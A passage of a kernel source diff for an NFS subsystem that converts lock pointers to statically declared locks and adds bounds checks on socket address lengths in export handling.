TAILQ_HEAD(nfsrv_reqcache_lru, nfsrvcache) nfsrv_reqcache_lruhead; u_long nfsrv_reqcache_hash; -lck_grp_t *nfsrv_reqcache_lck_grp; -lck_mtx_t *nfsrv_reqcache_mutex; +static LCK_GRP_DECLARE(nfsrv_reqcache_lck_grp, "nfsrv_reqcache"); +LCK_MTX_DECLARE(nfsrv_reqcache_mutex, &nfsrv_reqcache_lck_grp); /* * Static array that defines which nfs rpc's are nonidempotent @@ -164,11 +164,11 @@ nfsrv_initcache(void) return; } - lck_mtx_lock(nfsrv_reqcache_mutex); + lck_mtx_lock(&nfsrv_reqcache_mutex); /* init nfs server request cache hash table */ nfsrv_reqcache_hashtbl = hashinit(nfsrv_reqcache_size, M_NFSD, &nfsrv_reqcache_hash); TAILQ_INIT(&nfsrv_reqcache_lruhead); - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); } /* @@ -239,7 +239,7 @@ nfsrv_getcache( if (!nd->nd_nam2) { return RC_DOIT; } - 
lck_mtx_lock(nfsrv_reqcache_mutex); + lck_mtx_lock(&nfsrv_reqcache_mutex); loop: for (rp = NFSRCHASH(nd->nd_retxid)->lh_first; rp != 0; rp = rp->rc_hash.le_next) { @@ -247,7 +247,7 @@ loop: netaddr_match(rp->rc_family, &rp->rc_haddr, nd->nd_nam)) { if ((rp->rc_flag & RC_LOCKED) != 0) { rp->rc_flag |= RC_WANTED; - msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); + msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); goto loop; } rp->rc_flag |= RC_LOCKED; @@ -293,7 +293,7 @@ loop: rp->rc_flag &= ~RC_WANTED; wakeup(rp); } - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); return ret; } } @@ -315,12 +315,12 @@ loop: if (!rp) { /* no entry to reuse? */ /* OK, we just won't be able to cache this request */ - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); return RC_DOIT; } while ((rp->rc_flag & RC_LOCKED) != 0) { rp->rc_flag |= RC_WANTED; - msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); + msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); rp = nfsrv_reqcache_lruhead.tqh_first; } rp->rc_flag |= RC_LOCKED; @@ -365,7 +365,7 @@ loop: rp->rc_flag &= ~RC_WANTED; wakeup(rp); } - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); return RC_DOIT; } @@ -384,7 +384,7 @@ nfsrv_updatecache( if (!nd->nd_nam2) { return; } - lck_mtx_lock(nfsrv_reqcache_mutex); + lck_mtx_lock(&nfsrv_reqcache_mutex); loop: for (rp = NFSRCHASH(nd->nd_retxid)->lh_first; rp != 0; rp = rp->rc_hash.le_next) { @@ -392,7 +392,7 @@ loop: netaddr_match(rp->rc_family, &rp->rc_haddr, nd->nd_nam)) { if ((rp->rc_flag & RC_LOCKED) != 0) { rp->rc_flag |= RC_WANTED; - msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); + msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL); goto loop; } rp->rc_flag |= RC_LOCKED; @@ -430,11 +430,11 @@ loop: rp->rc_flag &= ~RC_WANTED; wakeup(rp); } - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); return; } } - 
lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); } /* @@ -445,7 +445,7 @@ nfsrv_cleancache(void) { struct nfsrvcache *rp, *nextrp; - lck_mtx_lock(nfsrv_reqcache_mutex); + lck_mtx_lock(&nfsrv_reqcache_mutex); for (rp = nfsrv_reqcache_lruhead.tqh_first; rp != 0; rp = nextrp) { nextrp = rp->rc_lru.tqe_next; LIST_REMOVE(rp, rc_hash); @@ -454,7 +454,7 @@ nfsrv_cleancache(void) } nfsrv_reqcache_count = 0; FREE(nfsrv_reqcache_hashtbl, M_TEMP); - lck_mtx_unlock(nfsrv_reqcache_mutex); + lck_mtx_unlock(&nfsrv_reqcache_mutex); } #endif /* CONFIG_NFS_SERVER */ diff --git a/bsd/nfs/nfs_subs.c b/bsd/nfs/nfs_subs.c index b4be3353f..a58fc7869 100644 --- a/bsd/nfs/nfs_subs.c +++ b/bsd/nfs/nfs_subs.c @@ -1040,7 +1040,7 @@ nfs_get_xid(uint64_t *xidp) { struct timeval tv; - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); if (!nfs_xid) { /* * Derive initial xid from system time. @@ -1059,7 +1059,7 @@ nfs_get_xid(uint64_t *xidp) nfs_xid++; } *xidp = nfs_xid + (nfs_xidwrap << 32); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); } /* @@ -2755,13 +2755,14 @@ nfsrv_hang_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) struct radix_node *rn; struct sockaddr *saddr, *smask; struct domain *dom; - size_t i; + size_t i, ss_minsize; int error; unsigned int net; user_addr_t uaddr; kauth_cred_t cred; uaddr = unxa->nxa_nets; + ss_minsize = sizeof(((struct sockaddr_storage *)0)->ss_len) + sizeof(((struct sockaddr_storage *)0)->ss_family); for (net = 0; net < unxa->nxa_netcount; net++, uaddr += sizeof(nxna)) { error = copyin(uaddr, &nxna, sizeof(nxna)); if (error) { @@ -2769,7 +2770,9 @@ nfsrv_hang_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) } if (nxna.nxna_addr.ss_len > sizeof(struct sockaddr_storage) || + (nxna.nxna_addr.ss_len != 0 && nxna.nxna_addr.ss_len < ss_minsize) || nxna.nxna_mask.ss_len > sizeof(struct sockaddr_storage) || + (nxna.nxna_mask.ss_len != 0 && 
nxna.nxna_mask.ss_len < ss_minsize) || nxna.nxna_addr.ss_family > AF_MAX || nxna.nxna_mask.ss_family > AF_MAX) { return EINVAL; @@ -2956,6 +2959,7 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) struct radix_node *rn; struct nfsrv_free_netopt_arg fna; struct nfs_netopt *nno; + size_t ss_minsize; user_addr_t uaddr; unsigned int net; int i, error; @@ -2976,6 +2980,7 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) /* delete only the exports specified */ uaddr = unxa->nxa_nets; + ss_minsize = sizeof(((struct sockaddr_storage *)0)->ss_len) + sizeof(((struct sockaddr_storage *)0)->ss_family); for (net = 0; net < unxa->nxa_netcount; net++, uaddr += sizeof(nxna)) { error = copyin(uaddr, &nxna, sizeof(nxna)); if (error) { @@ -2994,6 +2999,20 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) continue; } + if (nxna.nxna_addr.ss_len > sizeof(struct sockaddr_storage) || + (nxna.nxna_addr.ss_len != 0 && nxna.nxna_addr.ss_len < ss_minsize) || + nxna.nxna_addr.ss_family > AF_MAX) { + printf("nfsrv_free_addrlist: invalid socket address (%u)\n", net); + continue; + } + + if (nxna.nxna_mask.ss_len > sizeof(struct sockaddr_storage) || + (nxna.nxna_mask.ss_len != 0 && nxna.nxna_mask.ss_len < ss_minsize) || + nxna.nxna_mask.ss_family > AF_MAX) { + printf("nfsrv_free_addrlist: invalid socket mask (%u)\n", net); + continue; + } + if ((rnh = nx->nx_rtable[nxna.nxna_addr.ss_family]) == 0) { /* AF not initialized? 
*/ if (!(unxa->nxa_flags & NXA_ADD)) { @@ -3031,21 +3050,24 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa) void enablequotas(struct mount *mp, vfs_context_t ctx); // XXX +#define DATA_VOLUME_MP "/System/Volumes/Data" // PLATFORM_DATA_VOLUME_MOUNT_POINT + int nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx) { int error = 0; - size_t pathlen; + size_t pathlen, nxfs_pathlen; struct nfs_exportfs *nxfs, *nxfs2, *nxfs3; struct nfs_export *nx, *nx2, *nx3; struct nfs_filehandle nfh; struct nameidata mnd, xnd; vnode_t mvp = NULL, xvp = NULL; mount_t mp = NULL; - char path[MAXPATHLEN]; + char path[MAXPATHLEN], *nxfs_path; char fl_pathbuff[MAXPATHLEN]; int fl_pathbuff_len = MAXPATHLEN; int expisroot; + size_t datavol_len = strlen(DATA_VOLUME_MP); if (unxa->nxa_flags == NXA_CHECK) { /* just check if the path is an NFS-exportable file system */ @@ -3147,7 +3169,8 @@ nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx) } if (nxfs) { /* verify exported FS path matches given path */ - if (strncmp(path, nxfs->nxfs_path, MAXPATHLEN)) { + if (strncmp(path, nxfs->nxfs_path, MAXPATHLEN) && + (strncmp(path, DATA_VOLUME_MP, datavol_len) || strncmp(path + datavol_len, nxfs->nxfs_path, MAXPATHLEN - datavol_len))) { error = EEXIST; goto unlock_out; } @@ -3239,13 +3262,20 @@ nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx) } bzero(nxfs, sizeof(struct nfs_exportfs)); nxfs->nxfs_id = unxa->nxa_fsid; - MALLOC(nxfs->nxfs_path, char*, pathlen, M_TEMP, M_WAITOK); + if (mp) { + nxfs_path = mp->mnt_vfsstat.f_mntonname; + nxfs_pathlen = sizeof(mp->mnt_vfsstat.f_mntonname); + } else { + nxfs_path = path; + nxfs_pathlen = pathlen; + } + MALLOC(nxfs->nxfs_path, char*, nxfs_pathlen, M_TEMP, M_WAITOK); if (!nxfs->nxfs_path) { FREE(nxfs, M_TEMP); error = ENOMEM; goto out; } - bcopy(path, nxfs->nxfs_path, pathlen); + bcopy(nxfs_path, nxfs->nxfs_path, nxfs_pathlen); /* insert into list in reverse-sorted order */ nxfs3 = NULL; 
LIST_FOREACH(nxfs2, &nfsrv_exports, nxfs_next) { @@ -4052,7 +4082,7 @@ nfsrv_init_user_list(struct nfs_active_user_list *ulist) } ulist->node_count = 0; - lck_mtx_init(&ulist->user_mutex, nfsrv_active_user_mutex_group, LCK_ATTR_NULL); + lck_mtx_init(&ulist->user_mutex, &nfsrv_active_user_mutex_group, LCK_ATTR_NULL); } /* Free all nodes in an active user list */ @@ -4076,7 +4106,7 @@ nfsrv_free_user_list(struct nfs_active_user_list *ulist) } ulist->node_count = 0; - lck_mtx_destroy(&ulist->user_mutex, nfsrv_active_user_mutex_group); + lck_mtx_destroy(&ulist->user_mutex, &nfsrv_active_user_mutex_group); } /* Reclaim old expired user nodes from active user lists. */ diff --git a/bsd/nfs/nfs_syscalls.c b/bsd/nfs/nfs_syscalls.c index 90cba6ed4..511bc3c6b 100644 --- a/bsd/nfs/nfs_syscalls.c +++ b/bsd/nfs/nfs_syscalls.c @@ -358,7 +358,7 @@ void nfsiod_terminate(struct nfsiod *niod) { nfsiod_thread_count--; - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); if (niod) { FREE(niod, M_TEMP); } else { @@ -377,21 +377,21 @@ nfsiod_thread(void) MALLOC(niod, struct nfsiod *, sizeof(struct nfsiod), M_TEMP, M_WAITOK); if (!niod) { - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); nfsiod_thread_count--; wakeup(current_thread()); - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); thread_terminate(current_thread()); /*NOTREACHED*/ } bzero(niod, sizeof(*niod)); - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); TAILQ_INSERT_HEAD(&nfsiodfree, niod, niod_link); wakeup(current_thread()); - error = msleep0(niod, nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue); + error = msleep0(niod, &nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue); /* shouldn't return... 
so we have an error */ /* remove an old nfsiod struct and terminate */ - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); if ((niod = TAILQ_LAST(&nfsiodfree, nfsiodlist))) { TAILQ_REMOVE(&nfsiodfree, niod, niod_link); } @@ -408,18 +408,18 @@ nfsiod_start(void) { thread_t thd = THREAD_NULL; - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); if ((nfsiod_thread_count >= NFSIOD_MAX) && (nfsiod_thread_count > 0)) { - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); return EBUSY; } nfsiod_thread_count++; if (kernel_thread_start((thread_continue_t)nfsiod_thread, NULL, &thd) != KERN_SUCCESS) { - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); return EBUSY; } /* wait for the thread to complete startup */ - msleep(thd, nfsiod_mutex, PWAIT | PDROP, "nfsiodw", NULL); + msleep(thd, &nfsiod_mutex, PWAIT | PDROP, "nfsiodw", NULL); thread_deallocate(thd); return 0; } @@ -438,7 +438,7 @@ nfsiod_continue(int error) struct nfs_reqqhead iodq; int morework; - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); niod = TAILQ_FIRST(&nfsiodwork); if (!niod) { /* there's no work queued up */ @@ -478,7 +478,7 @@ worktodo: req->r_flags |= R_IOD; lck_mtx_unlock(&req->r_mtx); } - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); /* process the queue */ TAILQ_FOREACH_SAFE(req, &iodq, r_achain, treq) { @@ -488,7 +488,7 @@ worktodo: } /* now check if there's more/other work to be done */ - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); morework = !TAILQ_EMPTY(&nmp->nm_iodq); if (!morework || !TAILQ_EMPTY(&nfsiodmounts)) { /* @@ -516,10 +516,10 @@ worktodo: /* queue ourselves back up - if there aren't too many threads running */ if (nfsiod_thread_count <= NFSIOD_MAX) { TAILQ_INSERT_HEAD(&nfsiodfree, niod, niod_link); - error = msleep0(niod, nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue); + error = msleep0(niod, &nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, 
nfsiod_continue); /* shouldn't return... so we have an error */ /* remove an old nfsiod struct and terminate */ - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); if ((niod = TAILQ_LAST(&nfsiodfree, nfsiodlist))) { TAILQ_REMOVE(&nfsiodfree, niod, niod_link); } @@ -1028,16 +1028,16 @@ nfssvc_addsock(socket_t so, mbuf_t mynam) return ENOMEM; } bzero((caddr_t)slp, sizeof(struct nfsrv_sock)); - lck_rw_init(&slp->ns_rwlock, nfsrv_slp_rwlock_group, LCK_ATTR_NULL); - lck_mtx_init(&slp->ns_wgmutex, nfsrv_slp_mutex_group, LCK_ATTR_NULL); + lck_rw_init(&slp->ns_rwlock, &nfsrv_slp_rwlock_group, LCK_ATTR_NULL); + lck_mtx_init(&slp->ns_wgmutex, &nfsrv_slp_mutex_group, LCK_ATTR_NULL); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); if (soprotocol == IPPROTO_UDP) { if (sodomain == AF_INET) { /* There should be only one UDP/IPv4 socket */ if (nfsrv_udpsock) { - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); nfsrv_slpfree(slp); mbuf_freem(mynam); return EEXIST; @@ -1047,7 +1047,7 @@ nfssvc_addsock(socket_t so, mbuf_t mynam) if (sodomain == AF_INET6) { /* There should be only one UDP/IPv6 socket */ if (nfsrv_udp6sock) { - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); nfsrv_slpfree(slp); mbuf_freem(mynam); return EEXIST; @@ -1130,7 +1130,7 @@ nfssvc_addsock(socket_t so, mbuf_t mynam) slp->ns_flag = SLP_VALID | SLP_NEEDQ; nfsrv_wakenfsd(slp); - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return 0; } @@ -1194,12 +1194,12 @@ nfssvc_nfsd(void) return ENOMEM; } bzero(nfsd, sizeof(struct nfsd)); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); if (nfsd_thread_count++ == 0) { nfsrv_initcache(); /* Init the server request cache */ } TAILQ_INSERT_TAIL(&nfsd_head, nfsd, nfsd_chain); - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); context.vc_thread = current_thread(); @@ -1222,7 +1222,7 @@ nfssvc_nfsd(void) } else { /* need to find work to do */ error = 0; - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); 
while (!nfsd->nfsd_slp && TAILQ_EMPTY(&nfsrv_sockwait) && TAILQ_EMPTY(&nfsrv_sockwork)) { if (nfsd_thread_count > nfsd_thread_max) { /* @@ -1234,7 +1234,7 @@ nfssvc_nfsd(void) } nfsd->nfsd_flag |= NFSD_WAITING; TAILQ_INSERT_HEAD(&nfsd_queue, nfsd, nfsd_queue); - error = msleep(nfsd, nfsd_mutex, PSOCK | PCATCH, "nfsd", &to); + error = msleep(nfsd, &nfsd_mutex, PSOCK | PCATCH, "nfsd", &to); if (error) { if (nfsd->nfsd_flag & NFSD_WAITING) { TAILQ_REMOVE(&nfsd_queue, nfsd, nfsd_queue); @@ -1290,7 +1290,7 @@ nfssvc_nfsd(void) slp->ns_flag |= SLP_WORKQ; lck_rw_done(&slp->ns_rwlock); } - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); if (!slp) { continue; } @@ -1495,7 +1495,7 @@ nfssvc_nfsd(void) } NFS_ZFREE(nfsrv_descript_zone, nd); nfsrv_slpderef(slp); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); goto done; } break; @@ -1553,14 +1553,14 @@ nfssvc_nfsd(void) nfsrv_slpderef(slp); } } - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); done: TAILQ_REMOVE(&nfsd_head, nfsd, nfsd_chain); FREE(nfsd, M_NFSD); if (--nfsd_thread_count == 0) { nfsrv_cleanup(); } - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return error; } @@ -1677,8 +1677,8 @@ nfsrv_slpfree(struct nfsrv_sock *slp) } LIST_INIT(&slp->ns_tq); - lck_rw_destroy(&slp->ns_rwlock, nfsrv_slp_rwlock_group); - lck_mtx_destroy(&slp->ns_wgmutex, nfsrv_slp_mutex_group); + lck_rw_destroy(&slp->ns_rwlock, &nfsrv_slp_rwlock_group); + lck_mtx_destroy(&slp->ns_wgmutex, &nfsrv_slp_mutex_group); FREE(slp, M_NFSSVC); } @@ -1734,9 +1734,9 @@ nfsrv_slpderef_locked(struct nfsrv_sock *slp) void nfsrv_slpderef(struct nfsrv_sock *slp) { - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); nfsrv_slpderef_locked(slp); - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); } /* @@ -1751,7 +1751,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1) time_t time_to_wait = nfsrv_sock_idle_timeout; microuptime(&now); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); /* 
Turn off the timer if we're suppose to and get out */ if (nfsrv_sock_idle_timeout < NFSD_MIN_IDLE_TIMEOUT) { @@ -1759,7 +1759,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1) } if ((nfsrv_sock_tcp_cnt <= 2 * nfsd_thread_max) || (nfsrv_sock_idle_timeout == 0)) { nfsrv_idlesock_timer_on = 0; - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return; } @@ -1800,7 +1800,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1) nfs_interval_timer_start(nfsrv_idlesock_timer_call, time_to_wait * 1000); /* Remember when the next timer will fire for nfssvc_addsock. */ nfsrv_idlesock_timer_on = now.tv_sec + time_to_wait; - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); } /* @@ -1832,7 +1832,7 @@ nfsrv_cleanup(void) /* * Flush pending file write fsevents */ - lck_mtx_lock(nfsrv_fmod_mutex); + lck_mtx_lock(&nfsrv_fmod_mutex); for (i = 0; i < NFSRVFMODHASHSZ; i++) { for (fp = LIST_FIRST(&nfsrv_fmod_hashtbl[i]); fp; fp = nfp) { /* @@ -1853,7 +1853,7 @@ nfsrv_cleanup(void) } } nfsrv_fmod_pending = 0; - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); #endif nfsrv_uc_cleanup(); /* Stop nfs socket up-call threads */ diff --git a/bsd/nfs/nfs_upcall.c b/bsd/nfs/nfs_upcall.c index b719f88a0..4acf8cf13 100644 --- a/bsd/nfs/nfs_upcall.c +++ b/bsd/nfs/nfs_upcall.c @@ -66,15 +66,15 @@ struct nfsrv_uc_arg { TAILQ_HEAD(nfsrv_uc_q, nfsrv_uc_arg); static struct nfsrv_uc_queue { - lck_mtx_t *ucq_lock; + lck_mtx_t ucq_lock; struct nfsrv_uc_q ucq_queue[1]; thread_t ucq_thd; uint32_t ucq_flags; } nfsrv_uc_queue_tbl[NFS_UC_HASH_SZ]; #define NFS_UC_QUEUE_SLEEPING 0x0001 -static lck_grp_t *nfsrv_uc_group; -static lck_mtx_t *nfsrv_uc_shutdown_lock; +static LCK_GRP_DECLARE(nfsrv_uc_group, "nfs_upcall_locks"); +static LCK_MTX_DECLARE(nfsrv_uc_shutdown_lock, &nfsrv_uc_group); static volatile int nfsrv_uc_shutdown = 0; static int32_t nfsrv_uc_thread_count; @@ -100,18 +100,18 @@ nfsrv_uc_thread(void *arg, wait_result_t wr 
__unused) DPRINT("nfsrv_uc_thread %d started\n", qi); while (!nfsrv_uc_shutdown) { - lck_mtx_lock(myqueue->ucq_lock); + lck_mtx_lock(&myqueue->ucq_lock); while (!nfsrv_uc_shutdown && TAILQ_EMPTY(myqueue->ucq_queue)) { myqueue->ucq_flags |= NFS_UC_QUEUE_SLEEPING; - error = msleep(myqueue, myqueue->ucq_lock, PSOCK, "nfsd_upcall_handler", NULL); + error = msleep(myqueue, &myqueue->ucq_lock, PSOCK, "nfsd_upcall_handler", NULL); myqueue->ucq_flags &= ~NFS_UC_QUEUE_SLEEPING; if (error) { printf("nfsrv_uc_thread received error %d\n", error); } } if (nfsrv_uc_shutdown) { - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); break; } @@ -123,7 +123,7 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused) ep->nua_flags &= ~NFS_UC_QUEUED; - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); #ifdef NFS_UC_Q_DEBUG OSDecrementAtomic(&nfsrv_uc_queue_count); @@ -133,10 +133,10 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused) nfsrv_rcv(ep->nua_so, (void *)ep->nua_slp, ep->nua_waitflag); } - lck_mtx_lock(nfsrv_uc_shutdown_lock); + lck_mtx_lock(&nfsrv_uc_shutdown_lock); nfsrv_uc_thread_count--; wakeup(&nfsrv_uc_thread_count); - lck_mtx_unlock(nfsrv_uc_shutdown_lock); + lck_mtx_unlock(&nfsrv_uc_shutdown_lock); thread_terminate(current_thread()); } @@ -160,7 +160,7 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp) return; } /* If we're queued we might race with nfsrv_uc_thread */ - lck_mtx_lock(myqueue->ucq_lock); + lck_mtx_lock(&myqueue->ucq_lock); if (ap->nua_flags & NFS_UC_QUEUED) { printf("nfsrv_uc_dequeue remove %p\n", ap); TAILQ_REMOVE(myqueue->ucq_queue, ap, nua_svcq); @@ -171,7 +171,7 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp) } FREE(slp->ns_ua, M_TEMP); slp->ns_ua = NULL; - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); } /* @@ -180,16 +180,12 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp) void nfsrv_uc_init(void) { - int i; - - nfsrv_uc_group = lck_grp_alloc_init("nfs_upcall_locks", LCK_GRP_ATTR_NULL); - 
for (i = 0; i < NFS_UC_HASH_SZ; i++) { + for (int i = 0; i < NFS_UC_HASH_SZ; i++) { TAILQ_INIT(nfsrv_uc_queue_tbl[i].ucq_queue); - nfsrv_uc_queue_tbl[i].ucq_lock = lck_mtx_alloc_init(nfsrv_uc_group, LCK_ATTR_NULL); + lck_mtx_init(&nfsrv_uc_queue_tbl[i].ucq_lock, &nfsrv_uc_group, LCK_ATTR_NULL); nfsrv_uc_queue_tbl[i].ucq_thd = THREAD_NULL; nfsrv_uc_queue_tbl[i].ucq_flags = 0; } - nfsrv_uc_shutdown_lock = lck_mtx_alloc_init(nfsrv_uc_group, LCK_ATTR_NULL); } /* @@ -210,9 +206,9 @@ nfsrv_uc_start(void) DPRINT("nfsrv_uc_start\n"); /* Wait until previous shutdown finishes */ - lck_mtx_lock(nfsrv_uc_shutdown_lock); + lck_mtx_lock(&nfsrv_uc_shutdown_lock); while (nfsrv_uc_shutdown || nfsrv_uc_thread_count > 0) { - msleep(&nfsrv_uc_thread_count, nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_wait", NULL); + msleep(&nfsrv_uc_thread_count, &nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_wait", NULL); } /* Start up-call threads */ @@ -234,7 +230,7 @@ out: nfsrv_uc_queue_count = 0ULL; nfsrv_uc_queue_max_seen = 0ULL; #endif - lck_mtx_unlock(nfsrv_uc_shutdown_lock); + lck_mtx_unlock(&nfsrv_uc_shutdown_lock); } /* @@ -252,15 +248,15 @@ nfsrv_uc_stop(void) /* Signal up-call threads to stop */ nfsrv_uc_shutdown = 1; for (i = 0; i < thread_count; i++) { - lck_mtx_lock(nfsrv_uc_queue_tbl[i].ucq_lock); + lck_mtx_lock(&nfsrv_uc_queue_tbl[i].ucq_lock); wakeup(&nfsrv_uc_queue_tbl[i]); - lck_mtx_unlock(nfsrv_uc_queue_tbl[i].ucq_lock); + lck_mtx_unlock(&nfsrv_uc_queue_tbl[i].ucq_lock); } /* Wait until they are done shutting down */ - lck_mtx_lock(nfsrv_uc_shutdown_lock); + lck_mtx_lock(&nfsrv_uc_shutdown_lock); while (nfsrv_uc_thread_count > 0) { - msleep(&nfsrv_uc_thread_count, nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_stop", NULL); + msleep(&nfsrv_uc_thread_count, &nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_stop", NULL); } /* Deallocate old threads */ @@ -273,7 +269,7 @@ nfsrv_uc_stop(void) /* Enable restarting */ nfsrv_uc_shutdown = 0; - 
lck_mtx_unlock(nfsrv_uc_shutdown_lock); + lck_mtx_unlock(&nfsrv_uc_shutdown_lock); } /* @@ -296,13 +292,13 @@ nfsrv_uc_cleanup(void) for (i = 0; i < NFS_UC_HASH_SZ; i++) { struct nfsrv_uc_queue *queue = &nfsrv_uc_queue_tbl[i]; - lck_mtx_lock(queue->ucq_lock); + lck_mtx_lock(&queue->ucq_lock); while (!TAILQ_EMPTY(queue->ucq_queue)) { struct nfsrv_uc_arg *ep = TAILQ_FIRST(queue->ucq_queue); TAILQ_REMOVE(queue->ucq_queue, ep, nua_svcq); ep->nua_flags &= ~NFS_UC_QUEUED; } - lck_mtx_unlock(queue->ucq_lock); + lck_mtx_unlock(&queue->ucq_lock); } nfsrv_uc_stop(); @@ -323,11 +319,11 @@ nfsrv_uc_proxy(socket_t so, void *arg, int waitflag) int qi = uap->nua_qi; struct nfsrv_uc_queue *myqueue = &nfsrv_uc_queue_tbl[qi]; - lck_mtx_lock(myqueue->ucq_lock); + lck_mtx_lock(&myqueue->ucq_lock); DPRINT("nfsrv_uc_proxy called for %p (%p)\n", uap, uap->nua_slp); DPRINT("\tUp-call queued on %d for wakeup of %p\n", qi, myqueue); if (uap == NULL || uap->nua_flags & NFS_UC_QUEUED) { - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); return; /* Already queued or freed */ } @@ -355,7 +351,7 @@ nfsrv_uc_proxy(socket_t so, void *arg, int waitflag) } } #endif - lck_mtx_unlock(myqueue->ucq_lock); + lck_mtx_unlock(&myqueue->ucq_lock); } diff --git a/bsd/nfs/nfs_vfsops.c b/bsd/nfs/nfs_vfsops.c index 82e3c594c..482f8f758 100644 --- a/bsd/nfs/nfs_vfsops.c +++ b/bsd/nfs/nfs_vfsops.c @@ -134,8 +134,9 @@ ZONE_DECLARE(nfsmnt_zone, "NFS mount", sizeof(struct nfsmount), ZC_ZFREE_CLEARMEM); int nfs_ticks; -static lck_grp_t *nfs_global_grp, *nfs_mount_grp; -lck_mtx_t *nfs_global_mutex; +static LCK_GRP_DECLARE(nfs_global_grp, "nfs_global"); +static LCK_GRP_DECLARE(nfs_mount_grp, "nfs_mount"); +LCK_MTX_DECLARE(nfs_global_mutex, &nfs_global_grp); uint32_t nfs_fs_attr_bitmap[NFS_ATTR_BITMAP_LEN]; uint32_t 